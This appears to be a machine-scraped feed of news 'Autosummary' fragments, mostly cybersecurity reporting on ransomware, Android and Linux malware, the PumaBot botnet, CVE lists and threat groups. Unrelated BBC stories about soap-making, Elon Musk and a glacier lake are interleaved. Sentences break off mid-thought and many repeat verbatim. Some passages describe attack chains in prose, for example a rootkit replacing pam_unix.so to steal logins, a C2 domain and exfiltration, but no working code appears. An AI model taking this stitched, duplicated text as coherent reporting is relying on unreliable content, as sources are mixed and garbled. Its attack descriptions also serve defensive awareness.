Previous high-profile Play ransomware victims include cloud computing company Rackspace, the City of Oakland in California, Dallas County, car retailer giant Arnold Clark, the Belgian city of Antwerp, and, more recently, doughnut chain Krispy Kreme and American semiconductor supplier Microchip Technology. "Autosummary:
"A vulnerability in Amazon Web Services (AWS), Microsoft Azure, and Oracle Cloud Infrastructure (OCI) cloud deployments of Cisco Identity Services Engine (ISE) could allow an unauthenticated, remote attacker to access sensitive data, execute limited administrative operations, modify system configurations, or disrupt services within the impacted systems," the company explained. "The post Cybersecurity jobs available right now: June 3, 2025 appeared first on Help Net Security.
"Autosummary:
Manager, IT Operations (Cloud, Security and Infrastructure) GMS Health Insurance | Canada | On-site – View job details As a Manager, IT Operations (Cloud, Security and Infrastructure), you will negotiate SLAs, review performance dashboards, maintain the security risk register, and coordinate remediation across IT, architecture, and business units. Engineer, Network Security Concentra | USA | On-site – View job details As an Engineer, Network Security, you will be responsible for planning, designing, developing, evaluating, testing, and integrating the organization’s security infrastructure, including the implementation and design of multiple security solutions. Senior Security Engineer, Application Security Constantinople | Australia | Hybrid – View job details As a Senior Security Engineer, Application Security, you will enhance and manage application security tooling such as SAST, DAST (both out-of-the-box and custom), open-source vulnerability scanning, and EASM. Information Security Officer Medison Pharma | Israel | On-site – View job details As an Information Security Officer, you will be responsible for developing, updating, and maintaining the organizational information security management framework, including policies, procedures, and work plans. Senior Network Security Engineer Elavon | Ireland | Hybrid – View job details As a Senior Network Security Engineer, you will be primarily responsible for implementing and supporting security solutions and technologies to help protect the organization’s systems from unauthorized access, use, disclosure, destruction, modification, or disruption. "Autosummary:
"In this Help Net Security interview, William Lyne, Deputy Director of UK’s National Crime Agency, discusses the cybercrime ecosystem and the threats it enables. He explains how cybercrime is becoming more accessible and fragmented. Lyne also talks about key trends, recent disruptions, and collaboration between law enforcement and the private sector. What are the most concerning trends you’re seeing in cybercriminal behaviour today? Cybercrime is a constantly evolving threat, which is supported and enabled by … More
The post How global collaboration is hitting cybercriminals where it hurts appeared first on Help Net Security.
"Autosummary:
I cannot comment on specific, ongoing investigations, but generally we see groups like these as comprised of individuals, often young men, in English-speaking countries who often have particular social engineering skills – exploiting people within organisations as opposed to using technical means to gain access to victim systems.Again in 2024, the NCA led Op DESTABILISE, which successfully disrupted Russian-speaking illicit finance networks that we know were utilised by a number of different ransomware groups, alongside a range of other threat actors. "A coalition of banking industry associations, including SIFA, the American Bankers Association (ABA), Bank Policy Institute (BPI), and several other lobbying groups have made a disgraceful appeal to the SEC to eliminate the rule requiring public disclosure of material cybersecurity incidents within four days of detection. This rule was established to ensure shareholders are properly informed and potential victims receive timely notice so they can take protective action, which wasn’t happening consistently before the rule … More
The post Bankers Association’s attack on cybersecurity transparency appeared first on Help Net Security.
"Autosummary:
A coalition of banking industry associations, including SIFA, the American Bankers Association (ABA), Bank Policy Institute (BPI), and several other lobbying groups have made a disgraceful appeal to the SEC to eliminate the rule requiring public disclosure of material cybersecurity incidents within four days of detection. Business leaders and cybersecurity professionals should see this for what it is: a shady move to protect image and profits at the expense of transparency, fairness, security, and public trust.They’re putting forward weak, recycled arguments in the hopes of shielding their industry from public scrutiny, narrative damage, and financial consequences. "Autosummary:
"Autosummary:
JS snippet to create a new contact on the device Source: Threat Fabric "Upon receiving the command "TRU9MMRHBCRO", Crocodilus adds a specified contact to the victim"s contact list," explains Threat Fabric in the report. "Interactive Brokers is warning customers to be on high alert due to a wave of scams involving fraudsters posing as company representatives. Interactive Brokers (IBKR) is a global brokerage firm that lets investors trade stocks, options, futures, and other assets on international markets. In a message sent to clients on June 2, the company said it is seeing more cases of criminals impersonating its employees, branding, and email addresses in order to trick people into … More
The post Scammers are impersonating Interactive Brokers: Here’s what you need to know appeared first on Help Net Security.
"Autosummary:
How to protect yourself Never share your login credentials Use multi-factor authentication on your account Be cautious of messages that create urgency Always verify who you are dealing with Report any suspicious activity to your local police or regulator If you are ever unsure whether a message is really from IBKR, contact their Client Services team directly through the company’s website. "Autosummary:
So, for example, having a process for MFA reset that recognizes the risk associated with resetting a high-privileged account: Require multi-party approval/escalation for admin-level account resets Require in-person verification if the process can"t be followed remotely Freeze self-service resets when suspicious behavior is encountered (this would require some kind of internal process and awareness training to raise the alarm if an attack is suspected) And watch out for these gotchas: If you receive a call, good practice is to terminate the call and dial the number on file for the employee.After MGM refused to pay, the attack eventually resulted in a 36-hour outage, a $100m hit, and a class-action lawsuit settled for $45m. in September 2023, where the hacker used LinkedIn information to impersonate an employee and reset the employee"s credentials, resulting in a 6TB data theft. Social engineering domain registrars to take control of the target organization"s DNS, hijacking their MX records and inbound mail, and using this to take over the company"s business app environments And latterly, using MFA-bypass AiTM phishing kits like Evilginx to steal live user sessions, bypassing all common forms of MFA (with the exception of WebAuthn/FIDO2) Scattered Spider phishing pages running Evilginx. "Autosummary:
The malware, according to a new report published by ThreatFabric, has also adopted improved obfuscation techniques to hinder analysis and detection, and includes the ability to create new contacts in the victim"s contacts list. "Autosummary:
Google fixed the second actively exploited Chrome zero-day since the start of the year Pierluigi Paganini June 03, 2025 June 03, 2025 Google addressed three vulnerabilities in its Chrome browser, including one that it actively exploited in attacks in the wild. "Autosummary:
"Autosummary:
Comprehensive scam detection: Scam Guard is trained to recognize various scams, including romance, phishing, financial fraud, text, robocall, and shipping fraud, helping you stay ahead of cybercriminals at all times. "Malwarebytes launched Scam Guard, an AI-powered digital safety companion that provides real-time feedback on scams, threats and malware alongside digital safety recommendations. Whether it’s a suspicious text, DM, email, image or link, Scam Guard offers judgment-free, personalized advice to help users spot and avoid potential scams. Embedded within the Malwarebytes Mobile Security app, the new feature aims to remove the stigma of shame around scams by helping educate and guide users before it’s too late. … More
The post Malwarebytes Scam Guard spots and avoids potential scams appeared first on Help Net Security.
"Autosummary:
Scam Guard is trained to recognize various scams, including romance, phishing, financial fraud, text, robocall and shipping fraud, helping users stay ahead of cybercriminals at all times. "Autosummary:
"Autosummary:
Meanwhile, smaller campaigns show a broader, global focus, impersonating apps from countries like Argentina, Brazil, the U.S., Indonesia, and India. "Autosummary:
Below are the descriptions for these flaws: CVE-2021-32030 ASUS Routers Improper Authentication Vulnerability CVE-2023-39780 ASUS RT-AX55 Routers OS Command Injection Vulnerability CVE-2024-56145 Craft CMS Code Injection Vulnerability CVE-2025-3935 ConnectWise ScreenConnect Improper Authentication Vulnerability CVE-2025-35939 Craft CMS External Control of Assumed-Immutable Web Parameter Vulnerability Last week, ConnectWise revealed it had detected suspicious activity linked to an advanced nation-state actor. "Autosummary:
"Autosummary:
A cyberattack hit hospitals operated by Covenant Health Pierluigi Paganini June 02, 2025 June 02, 2025 A cyberattack hit three hospitals operated by Covenant Health, forcing them to shut down all systems to contain the incident. "Autosummary:
She says ministers would be "knowingly throwing UK designers, artists, authors, musicians, media and nascent AI companies under the bus" if they don"t move to protect their output from what she describes as "state sanctioned theft" from a UK industry worth £124bn.Sir Nick Clegg, former president of global affairs at Meta, is among those broadly supportive of the bill, arguing that asking permission from all copyright holders would "kill the AI industry in this country". "Autosummary:
"Autosummary:
This week"s list includes — CVE-2025-3935 (ConnectWise ScreenConnect), CVE-2025-47577 (TI WooCommerce Wishlist plugin), CVE-2025-2760, CVE-2025-2761 (GIMP), CVE-2025-0072 (Arm Mali GPU), CVE-2025-27462, CVE-2025-27463, CVE-2025-27464 (Citrix XenServer VM Tools for Windows), CVE-2025-4793 (PHPGurukul Online Course Registration), CVE-2025-47933 (Argo CD), CVE-2025-46701 (Apache Tomcat CGI servlet), CVE-2025-48057 (Icinga 2), CVE-2025-48827, CVE-2025-48828 (vBulletin), CVE-2025-41438, CVE-2025-46352 (Consilium Safety CS5000 Fire Panel), CVE-2025-1907 (Instantel Micromate), CVE-2025-26383 (Johnson Controls iSTAR Configuration Utility), CVE-2018-1285 (Rockwell Automation FactoryTalk Historian ThingWorx), CVE-2025-26147 (Denodo Scheduler), CVE-2025-24916, and CVE-2025-24917 (Tenable Network Monitor).According to Dawn, among those arrested included Rameez Shahzad (aka Saim Raza), the alleged ringleader of the criminal enterprise, as well as Muhammad Aslam (Rameez"s father), Atif Hussain, Muhammad Umar Irshad, Yasir Ali, Syed Saim Ali Shah, Muhammad Nowsherwan, Burhanul Haq, Adnan Munawar, Abdul Moiz, Hussnain Haider, Bilal Ahmad, Dilbar Hussain, Muhammad Adeel Akram, Awais Rasool, Usama Farooq, Usama Mehmood and Hamad Nawaz.According to Dawn, among those arrested included Rameez Shahzad (aka Saim Raza), the alleged ringleader of the criminal enterprise, as well as Muhammad Aslam (Rameez"s father), Atif Hussain, Muhammad Umar Irshad, Yasir Ali, Syed Saim Ali Shah, Muhammad Nowsherwan, Burhanul Haq, Adnan Munawar, Abdul Moiz, Hussnain Haider, Bilal Ahmad, Dilbar Hussain, Muhammad Adeel Akram, Awais Rasool, Usama Farooq, Usama Mehmood and Hamad Nawaz.The hacking group, which overlaps with REF0657, STAC6451, and CL-STA-0048, makes use of various flaws in internet-exposed servers, including the recently disclosed SAP NetWeaver vulnerability, to obtain initial access, drop web shells, and deploy post-exploitation tools like Cobalt Strike, VShell, and Brute Ratel C4.The hacking group, which overlaps with REF0657, STAC6451, and CL-STA-0048, makes use of various flaws in internet-exposed servers, including the recently disclosed SAP NetWeaver vulnerability, to obtain initial access, drop web shells, and deploy post-exploitation tools like Cobalt Strike, VShell, and Brute Ratel C4.New versions of the malware have been found to improve upon their data exfiltration and remote-control functionality, in addition to refining its obfuscation methods, adding features, switching between encryption algorithms, shifting targets, setting itself as the default messaging app to harvest one-time passwords (OTPs), and modifying social engineering techniques to boost infection rates.New versions of the malware have been found to improve upon their data exfiltration and remote-control functionality, in addition to refining its obfuscation methods, adding features, switching between encryption algorithms, shifting targets, setting itself as the default messaging app to harvest one-time passwords (OTPs), and modifying social engineering techniques to boost infection rates.It supports Cobalt Strike, Mythic, and phishing setups across AWS, Azure, and DigitalOcean—handling config generation, provisioning, and teardown through repeatable, secure workflows.Stalkerware Apps Spyzie, Cocospy, and Spyic Go Offline — Three "near-identical but differently branded" stalkerware apps, Cocospy, Spyic, and Spyzie, have gone dark and the websites advertising them have disappeared." — Earlier this year, Lovable, the popular vibe coding app, was found to be susceptible to VibeScamming, enabling anyone to create perfect scam pages, host them, and even set up admin dashboards to track stolen data.Security Flaw in Lovable Allows Access to Sensitive Data — Earlier this year, Lovable, the popular vibe coding app, was found to be susceptible to VibeScamming, enabling anyone to create perfect scam pages, host them, and even set up admin dashboards to track stolen data."The admins did not provide the security they promised," officials said in a notice, stating they have also confiscated a database containing usernames, email addresses, payment information, and more."The admins did not provide the security they promised," officials said in a notice, stating they have also confiscated a database containing usernames, email addresses, payment information, and more.UTG-Q-015 Targets Government and Enterprise Websites — A threat actor called UTG-Q-015 has been observed leveraging N-day security flaws (CVE-2021-38647, CVE-2017-9805, and CVE-2017-12611) to infiltrate government and enterprise websites in March 2025, as well as single out blockchain websites and financial institutions using puddle mounting and instant messaging phishing tactics to deliver backdoors and other malicious payloads.Characterized as a pro-Palestinian threat group along the lines of Handala, Cyber Toufan has claimed responsibility for over 100 breaches across sectors including government, defense, finance, and critical infrastructure, OP Innovate said. — A threat actor called UTG-Q-015 has been observed leveraging N-day security flaws (CVE-2021-38647, CVE-2017-9805, and CVE-2017-12611) to infiltrate government and enterprise websites in March 2025, as well as single out blockchain websites and financial institutions using puddle mounting and instant messaging phishing tactics to deliver backdoors and other malicious payloads.U.S. Government Employee Arrested for Allegedly Trying to Leak Secrets to Foreign Government — Nathan Vilas Laatsch, a 28-year-old IT specialist employed by the Defense Intelligence Agency (DIA), was arrested on May 29, 2025, for allegedly attempting to transmit national defense information to an officer or agent of a foreign government. — Cybersecurity researchers have detailed a new Android malware called GhostSpy that enables keylogging, screen capture, background audio and video recording, SMS and call log theft, GPS location tracking, and remote command execution.New Android Malware GhostSpy Emerges — Cybersecurity researchers have detailed a new Android malware called GhostSpy that enables keylogging, screen capture, background audio and video recording, SMS and call log theft, GPS location tracking, and remote command execution. — Nathan Vilas Laatsch, a 28-year-old IT specialist employed by the Defense Intelligence Agency (DIA), was arrested on May 29, 2025, for allegedly attempting to transmit national defense information to an officer or agent of a foreign government. — Three "near-identical but differently branded" stalkerware apps, Cocospy, Spyic, and Spyzie, have gone dark and the websites advertising them have disappeared. "Autosummary:
Acreed isn"t different from a typical info-stealer regarding the information it targets, which includes data stored in Chrome, Firefox, and their various derivatives, including passwords, cookies, cryptocurrency wallets, and credit card details. "Autosummary:
" The Python code, Sysdig said, is designed to download and execute cryptocurrency miners like T-Rex and XMRig, creates a systemd service for persistence, and utilizes a Discord webhook for command-and-control (C2). HashiCorp Consul, likewise, could pave the way for arbitrary code execution if the system is not properly configured and it permits any user with remote access to the server to register services and define health checks, which, in turn, can include a bash command that will be executed by the registered agent. "Autosummary:
"Autosummary:
Qualcomm fixed three zero-days exploited in limited, targeted attacks Pierluigi Paganini June 02, 2025 June 02, 2025 Qualcomm addressed three zero-day vulnerabilities that, according to the company, have been exploited in limited, targeted attacks in the wild. "Autosummary:
A cyberattack hit hospitals operated by Covenant Health Pierluigi Paganini June 02, 2025 June 02, 2025 A cyberattack hit three hospitals operated by Covenant Health, forcing them to shut down all systems to contain the incident. "Autosummary:
Netlock is a significant Hungarian provider of digital certification services (electronic signatures, timestamping, and TLS/SSL certificates), best known for its Arany (Gold Class) Root CA, which is widely used in Hungary and other European countries. "Autosummary:
In May, Dior disclosed a data breach after threat actors breached its systems and stole customer contact details, purchase histories, and preferences. "Autosummary:
One report claims that 3.2 billion credentials were stolen last year; most (75%) via infostealers Large-scale data breaches, where hackers harvest entire databases of passwords and usernames from third-party companies you might have signed up to Credential stuffing, where hackers feed breached credentials into automated software, in an attempt to unlock accounts where you’ve reused that same compromised password Brute-force techniques, where they use trial and error to guess your passwords The consequences of inactive accounts If an attacker gains access to your account, they could: Use it to send spam and scams to your contacts (e.g., if it’s an inactive email or social media account), or even launch convincing phishing attacks in your name. For those accounts you want to keep, aside from updating the password to a strong, unique credential, and storing it in a password manager, consider the following: Switching on two-factor authentication (2FA), so that even if a hacker gets hold of your password, they won’t be able to compromise your account.A good way to find these is to search your email inbox for keywords like "Welcome,” "Verify account,” “Free trial,” Thank you for signing up,” “Validate your account,” etc. "Autosummary:
"Next to our plant that produces the soap and dog food, someone else has a water purification plant and we use the water that plant cannot purify, its waste so to say, for our water cooling system," he explains.Save Fritz Pinnow Reporter, Comayagua, Honduras Share Save Fritz Pinnow Hugo Daniel Chávez is proud of the soap his team makes from recycled cooking oil Few 27-year-olds look at used cooking oil and see a green business opportunity to produce soap or dog food. "Autosummary:
"Autosummary:
A race condition in systemd-coredump that allows an attacker to force a SUID process to crash and replace it with a non-SUID binary to access the original"s privileged process coredump, allowing the attacker to read sensitive data, such as /etc/shadow content, loaded by the original process SUID, short for Set User ID, is a special file permission that allows a user to execute a program with the privileges of its owner, rather than their own permissions. "Autosummary:
The first (CVE-2025-5054) affects Ubuntu’s core-dump handler, Apport, and the second (CVE-2025-4598) targets systemd-coredump, which is the default core-dump handler on Red Hat Enterprise Linux 9 and the recently released 10, as well as on Fedora. "Autosummary:
"Phishing scams used to be filled with awkward wording and obvious grammar mistakes. Not anymore. AI is now making it harder to distinguish what is real. According to Cofense, email-based scams surged 70% year over year, driven by AI’s ability to automate lures, spoof internal conversations, and bypass spam filters with subtle text variations. Criminals use AI algorithms to analyze large amounts of data to understand the interests, behavior, and preferences of their target. For … More
The post Using AI to outsmart AI-driven phishing scams appeared first on Help Net Security.
"Autosummary:
According to Cofense, email-based scams surged 70% year over year, driven by AI’s ability to automate lures, spoof internal conversations, and bypass spam filters with subtle text variations. Privacy concerns: AI systems that detect phishing often analyze emails, messages, attachments, and user behavior. "Autosummary:
"Autosummary:
In October last year, the US Government warned internet users to be vigilant of the ClickFix threat, giving the example of websites that impersonated Google, Facebook, reCAPTCHA, and others.Yes, as is so normal with cyber attacks these days, the malicious hackers will leave an extortion note on your system - telling you that you will need to pay a ransom for the decryption key that will unlock the encrypted files, and also to prevent the files from being published on the dark web. using hard-to-crack unique passwords to protect sensitive data and accounts, as well as enabling multi-factor authentication. "Autosummary:
remote code execution vulnerability CVE-2021-22205 - GitLab remote code execution vulnerability CVE-2024-9047 - WordPress File Upload plugin arbitrary file access vulnerability CVE-2024-27198 - JetBrains TeamCity authentication bypass vulnerability CVE-2024-27199 - JetBrains TeamCity path traversal vulnerability CVE-2024-51378 - CyberPanel remote code execution vulnerability CVE-2024-51567 - CyberPanel remote code execution vulnerability CVE-2024-56145 - Craft CMS remote code execution vulnerability Describing it as "highly active," Trend Micro noted that the threat actor has shifted its focus from financial services to logistics and online retail, and most recently, to IT companies, universities, and government organizations. "Autosummary:
Funnull, also called Fang Neng CDN (funnull[.]io, funnull[.]com, funnull[.]app, and funnull[.]buzz), was first attracted the attention of the cybersecurity community in June 2024 after it was implicated in the supply chain attack of widely-used Polyfill[.]io JavaScript library. "Autosummary:
“Today, the Department of the Treasury’s Office of Foreign Assets Control (OFAC) sanctioned Funnull Technology Inc., a Philippines-based company that provides computer infrastructure for hundreds of thousands of websites involved in virtual currency investment scams, commonly known as “pig butchering,” along with its administrator, Liu Lizhi.” "Autosummary:
ConnectWise is a Florida-based software company that provides IT management solutions, including Remote Monitoring and Management (RMM), cybersecurity tools, automation software, and Business management platforms.ConnectWise suffered a cyberattack carried out by a sophisticated nation state actor Pierluigi Paganini May 30, 2025 May 30, 2025 ConnectWise detected suspicious activity linked to a nation-state actor, impacting a small number of its ScreenConnect customers. "Autosummary:
Save Getty Images Liverpool won the English Premier League this season, and live football is the focus on many illegal streams A lack of action by big tech firms is enabling the "industrial scale theft" of premium video services, especially live sport, a new report says. "Autosummary:
The leaks ultimately expedited Conti"s shutdown, with the cybercrime members moving to other operations or starting new gangs, including Royal, Black Basta, BlackCat, AvosLocker, Karakurt, LockBit, Silent Ransom, DagonLocker, and ZEON. "Autosummary:
"Autosummary:
The disclosure comes as c/side revealed details of a ClickFix campaign that targets multiple platforms, such as Apple macOS, Android, and iOS, using techniques like browser-based redirections, fake UI prompts, and drive-by download techniques." AppleProcessHub Stealer, on the other hand, is designed to exfiltrate user files including bash history, zsh history, GitHub configurations, SSH information, and iCloud Keychain. "Autosummary:
The flaws, tracked under CVE-2025-48827 and CVE-2025-48828, and rated critical (CVSS v3 score: 10.0 and 9.0 respectively), are an API method invocation and a remote code execution (RCE) via template engine abuse flaws. "Autosummary:
"By leveraging counter antivirus services, malicious actors refine their weapons against the world"s toughest security systems to better slip past firewalls, evade forensic analysis, and wreak havoc across victims" systems. "Autosummary:
Elon Musk leaves White House but says Doge will continue 54 minutes ago Share Save Christal Hayes and Brandon Drenon BBC News Share Save Watch: Elon Musk says he is "disappointed" with Trump"s "big, beautiful bill", in interview with CBS Sunday Morning Elon Musk has said he is leaving the Trump administration after helping lead a tumultuous drive to shrink the size of US government that saw thousands of federal jobs axed. "Resecurity has officially launched its AI-driven Compliance Manager. The solution is engineered to help CISOs and compliance teams manage complex regulatory demands, reduce risk, and maintain alignment with global cybersecurity standards. The Compliance Manager delivers centralized visibility, automation, and expert-level guidance to ensure organizations stay audit-ready and resilient in the face of expanding data protection and information security regulations. The platform currently supports over 20 international and regional compliance frameworks, including: GDPR (General Data Protection … More
The post Resecurity Compliance Manage empowers cybersecurity leaders with AI-driven insights appeared first on Help Net Security.
"Autosummary:
"At Span Cyber Security Arena, I sat down with Ria Shetty, Director, Cyber Security & Resilience for Europe at Mastercard. Our conversation cut through the hype and focused on what CISOs deal with every day: how to embed security into innovation, manage supply chain risk, and prepare both systems and people for the threats ahead. For Shetty, the idea that innovation competes with security is a false choice. “They go hand in hand,” she says. … More
The post What CISOs can learn from the frontlines of fintech cybersecurity appeared first on Help Net Security.
"Autosummary:
Her team works with banks, merchants, and partners to raise awareness, provide tools, and help them secure their full environment. “Protection on the payment side is great, but if a customer is compromised elsewhere in their environment, that becomes our problem too,” she says. “You can have the smartest tool out there, but in the end, it depends on the human,” she says.Her team can provide tools and guidance, but success depends on how organizations handle their people, processes, and partners.That’s why transparency, privacy, and security are built into every step of her team’s work, not added at the end. "Cybersecurity leaders and consultants identified AI-driven automation and cost optimization as top organizational priorities, according to Wipro. 30% of respondents are investing in AI automation to enhance their cybersecurity operations. AI-driven automation can help in detecting and responding to threats more quickly and accurately, thereby reducing the need for extensive manual intervention. 26% of respondents are focusing on tools rationalization. This approach involves evaluating and consolidating duplicate security tools across platforms to eliminate redundancies and … More
The post CISOs prioritize AI-driven automation to optimize cybersecurity spending appeared first on Help Net Security.
"Autosummary:
Some organizations are transitioning cybersecurity into a business-risk-aligned management structure to enhance accountability at the board level, promote risk-aware behavior throughout the organization, and strengthen the case for necessary cybersecurity investments. "If you’re new to cybersecurity and looking for a book that doesn’t overwhelm you with jargon or dive too deep into technical territory, Cybersecurity For Dummies might be a solid starting point. It’s written with beginners in mind and assumes you know how to use a smartphone and computer but not much more. This latest edition, published in 2025, adds newer topics like AI threats, which help keep the material relevant. About the author Joseph … More
The post Review: Cybersecurity For Dummies, 3rd Edition appeared first on Help Net Security.
"Autosummary:
Personal safety tips for passwords, accounts, and devices Risks of public Wi-Fi and social engineering Security for small businesses and remote workers How to respond if you’re hacked Backing up and restoring your data Careers in cybersecurity What’s coming next, such as AI, smart devices, and more There are even chapters at the end that give “top ten” lists of practical advice. About the author Joseph Steinberg holds a suite of security certifications including: CISSP, ISSAP, ISSMP, and CSSLP. "Autosummary:
APT41, also tracked as Axiom, Blackfly, Brass Typhoon (formerly Barium), Bronze Atlas, Earth Baku, HOODOO, Red Kelpie, TA415, Wicked Panda, and Winnti, is the name assigned to a prolific nation-state group known for its targeting of governments and organizations within the global shipping and logistics, media and entertainment, technology, and automotive sectors. "Autosummary:
"Autosummary:
"The personal information involved was limited to name, contact information (such as phone number, postal or email address), Social Security number, driver’s license number or date of birth," the spokesperson also told BleepingComputer. "Autosummary:
Sophos said while the ransomware attack was ultimately thwarted, the attackers managed to steal data and dwell on the network for nine days before attempting to launch the locker, "The combination of vishing and email bombing continues to be a potent, effective combination for ransomware attackers – and the 3AM ransomware group has now found a way to take advantage of remote encryption to stay out of sight of traditional security software," Sean Gallagher, principal threat researcher at Sophos, said. "DragonForce is not just another ransomware brand – it"s a destabilizing force trying to reshape the ransomware landscape," Aiden Sinnott, senior threat researcher at Sophos Counter Threat Unit, said. "Autosummary:
" As the FBI revealed last month, cybercriminals have stolen a record $16,6 billion from Americans in 2024, with over $6.5 billion lost to investment scams, marking a massive increase in losses of over 33% compared to the previous year. "Autosummary:
The ransom note demands a $50,000 ransom to be paid in the hard-to-trace Monero cryptocurrency, claiming that the funds will support humanitarian causes in Palestine, Ukraine, Africa, and Asia. "Autosummary:
"Autosummary:
Victoria’s Secret ‘s website offline following a cyberattack Pierluigi Paganini May 29, 2025 May 29, 2025 Victoria’s Secret took its website offline after a cyberattack, with experts warning of rising threats against major retailers. "Autosummary:
This DLL uses advanced control flow obfuscation techniques, like register-based indirect calls, dynamic address arithmetic, 64-bit register overflow, and function dispatch tables, to hide its behavior. "Autosummary:
" ConnectWise is a Florida-based software company that provides IT management, RMM (remote monitoring and management), cybersecurity, and automation solutions for managed service providers (MSPs) and IT departments. "Autosummary:
Legitimate service abuse Google Apps Script is a JavaScript-based cloud scripting platform from Google that allows users to automate tasks and extend the functionality of Google Workspace products like Google Sheets, Docs, Drive, Gmail, and Calendar. "Autosummary:
" The three malware families are below - GRIMPULL, a downloader that uses a TOR tunnel to fetch additional .NET payloads that are decrypted, decompressed, and loaded into memory as .NET assemblies FROSTRIFT, a .NET backdoor that collects system information, details about installed applications, and scans for 48 extensions related to password managers, authenticators, and cryptocurrency wallets on Chromium-based web browsers XWorm, a known .NET-based remote access trojan (RAT) with features like keylogging, command execution, screen capture, information gathering, and victim notification via Telegram STARKVEIL also serves as a conduit to launch a Python-based dropper codenamed COILHATCH that"s actually tasked with running the aforementioned three payloads via DLL side-loading. The ransomware is equipped to escalate privileges and re-execute itself with administrative permissions, if not already, and encrypts files located in the partitions "C:\," "D:\," and "E:\" that match a certain set of extensions. "Autosummary:
" Meanwhile, the fate of the IRA, which the Congress has the power to amend or repeal along with the IIJA, is being decided, in part, by the budget bill, which aims to permanently extend President Trump"s first term tax cuts by making savings elsewhere. Meanwhile, actual clean energy investment in the US including from both government and private sources (the far larger share) dropped 3.8% in the first quarter of 2025 to $67.3bn, a second quarterly decline, according to new figures released by the Clean Investment Monitor. "Phishing has become the go-to method for attackers looking to get past security controls and access sensitive environments in Europe, according to Netskope. Users are now constantly dealing with phishing attempts, which have become so common and credible that even careful people can make mistakes. Adobe is the brand most commonly impersonated by cybercriminals, appearing in 29% of cloud phishing campaigns aimed at stealing credentials for digital services. Microsoft’s brand is the next most impersonated … More
The post GitHub becomes go-to platform for malware delivery across Europe appeared first on Help Net Security.
"Autosummary:
No app, or app traffic, should be considered trusted, or exempted from a security policy,” said Gianpietro Cutolo, Cloud Threat Researcher at Netskope Threat Labs. "This month’s roundup features exceptional open-source cybersecurity tools that are gaining attention for strengthening security across various environments. Vuls: Open-source agentless vulnerability scanner Vuls is an open-source tool that helps users find and manage security vulnerabilities. It was created to solve the daily problems admins face when trying to keep servers secure. LlamaFirewall: Open-source framework to detect and mitigate AI centric security risks LlamaFirewall is a system-level security framework for LLM-powered applications, built with a … More
The post Hottest cybersecurity open-source tools of the month: May 2025 appeared first on Help Net Security.
"Autosummary:
"A threat actor wielding the DragonForce ransomware has compromised an unnamed managed service provider (MSP) and pushed the malware onto its client organizations via SimpleHelp, a legitimate remote monitoring and management (RMM) tool. “Sophos MDR has medium confidence the threat actor exploited a chain of vulnerabilities that were released in January 2025,” the company’s incident responders shared on Tuesday. The vulnerabilities in question are CVE-2024-57727, CVE-2024-57728 and CVE-2024-57726, which can be used to compromise SimpleHelp … More
The post Attackers hit MSP, use its RMM software to deliver ransomware to clients appeared first on Help Net Security.
"Autosummary:
The vulnerabilities in question are CVE-2024-57727, CVE-2024-57728 and CVE-2024-57726, which can be used to compromise SimpleHelp server instances and, through them, push malicious payloads to machines with the client software installed. "Autosummary:
The threat activity has been attributed to an intrusion set dubbed Mimo (aka Mimo), which is believed to be active since March 2022, previously relying on vulnerabilities in Apache Log4j (CVE-2021-44228), Atlassian Confluence (CVE-2022-26134), PaperCut (CVE-2023–27350), and Apache ActiveMQ (CVE-2023-46604) to deploy the miner. "Autosummary:
"Autosummary:
“This research examines the attackers’ methods, such as deceptive websites and command infrastructure, indicating a clear intent to target individuals for financial gain by compromising their credentials, crypto wallets, and potentially selling access to their systems.” "Autosummary:
“Gholinejad and his co-conspirators — all of whom were overseas — caused tens of millions of dollars in losses and disrupted essential public services by deploying the Robbinhood ransomware against U. S. cities, health care organizations, and businesses,” said Matthew R. Galeotti, Head of the Justice Department’s Criminal Division. "Autosummary:
"The malicious activity, which lasted from 2022 and affected an institution designated as Czech critical infrastructure, was perpetrated by the cyberespionage actor APT31 that is publicly associated with the Ministry of State Security," the Czech government said. "Autosummary:
Now the Departments of Motor Vehicles (DMVs) of New York, Florida, and California are warning residents not to fall for the text message scams that try to trick users into clicking a link by telling them they owe a “small amount” in toll fees. "Autosummary:
Darktrace said its analysis of the campaign uncovered other related binaries that are said to be deployed as part of a broader campaign - ddaemon, a Go-based backdoor which is retrieve the binary "networkxm" into "/usr/src/bao/networkxm" and execute the shell script "installx.sh" networkxm, an SSH brute-force tool that functions similar to the botnet"s initial stage by fetching a password list from a C2 server and attempts to connect via SSH across a list of target IP addresses installx.sh, which is used to retrieve another shell script "jc.sh" from "1.lusyn[.]xyz," grant it read, write, and execute permissions for all access levels, run the script, and clear bash history jc.sh, which is configured to download a malicious "pam_unix.so" file from an external server and use it to replace the legitimate counterpart installed on the machine, as well as retrieve and run another binary named "1" from the same server pam_unix.so, which acts as a rootkit that steals credentials by intercepting successful logins and writing them to the file "/usr/bin/con.txt" 1, which is used to monitor for the file "con.txt" being written or moved to "/usr/bin/" and then exfiltrate its contents to the same server Given that the SSH brute-force capabilities of the botnet malware lends it worm-like capabilities, users are required to keep an eye out for anomalous SSH login activity, particularly failed login attempts, audit systemd services regularly, review authorized_keys files for the presence of unknown SSH keys, apply strict firewall rules to limit exposure, and filter HTTP requests with non-standard headers, such as X-API-KEY: jieruidashabi. "Autosummary:
New PumaBot targets Linux IoT surveillance devices Pierluigi Paganini May 28, 2025 May 28, 2025 PumaBot targets Linux IoT devices, using SSH brute-force attacks to steal credentials, spread malware, and mine crypto.“While it does not appear to propagate automatically like a traditional worm, it does maintain worm-like behavior by brute-forcing targets, suggesting a semi-automated botnet campaign focused on device compromise and long-term access.” "Autosummary:
He said that as a result, Lake Palcacocha - which is located above the city - now has four times as much water than in 2003 and that residents like him were at risk of flooding, especially if blocks of ice were to break off from Palcacocha glacier and fall into the lake, causing it to overflow. "Autosummary:
Gathering system data Source: QuorumCyber The malware can kill active processes or load additional EXE, DLL, or JavaScript payloads on the device. "Autosummary:
According to researchers at Mandiant, the criminals are setting up websites claiming to offer “AI video generator” services, and then using those fake tools to distribute information stealers, Trojans, and backdoors. Look out for ads with too-good-to-be-true offers, urgent deadlines, or unusual payment methods like cryptocurrency or wire transfers. "Autosummary:
"Autosummary:
The attack has been attributed to a state-sponsored threat actor tracked as APT31, which also overlaps with threat clusters known as Altaire, Bronze Vinewood, Judgement Panda, PerplexedGoblin, RedBravo, Red Keres, and Violet Typhoon (formerly Zirconium). "Autosummary:
